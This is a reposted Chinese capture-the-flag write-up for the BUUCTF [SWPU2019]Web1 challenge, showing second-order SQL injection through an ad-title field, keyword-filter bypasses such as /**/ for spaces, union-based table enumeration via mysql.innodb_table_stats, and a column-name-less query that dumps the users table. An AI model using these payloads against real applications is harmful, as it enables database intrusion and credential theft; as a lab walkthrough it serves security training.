BUUCTF: [SWPU2019]Web1

Posted 末初mochu7

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF: [SWPU2019]Web1相关的知识,希望对你有一定的参考价值。

https://buuoj.cn/challenges#[SWPU2019]Web1


登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字,例如andor。会有警告


猜测广告名存在注入,尝试在广告名处输入单引号',发布的时候并没有任何反应,发布后有个广告详情可以查看发布的广告。


直接报错了,基本确定广告名存在二次注入


然后再之后的对广告名的fuzz测试中发现以下过滤

空格被替换为空
or
and
join
--+
#
updatexml
extractvalue
exp
floor
...

尝试联合查询、首先需要判断有多少字段,order by不能使用,可以使用group by或者into @a, @b, @c, ...

无法注释就尝试构造闭合


空格就用/**/代替

title='group/**/by/**/23,'&content=mochu7&ac=add


联合查询

title='union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=mochu7&ac=add


查表明,因为这里过滤or所以也无法使用information_schema表,也没有sys表,所以使用mysql.innodb_table_stats

title='union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=mochu7&ac=add


但是因为没有字段信息可以查,使用无列名注入直接查内容

title='union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22&content=mochu7&ac=add

以上是关于BUUCTF: [SWPU2019]Web1的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF: [SWPU2019]Web1

[SWPU2019]Web1

BUU-WEB-[SWPU2019]Web1

[SWPU2019]Web1(无列名注入)

[SWPU2019]Web1(二次注入,无列名注入,bypass information_schema)

BUUCTF | [GXYCTF2019]BabySQli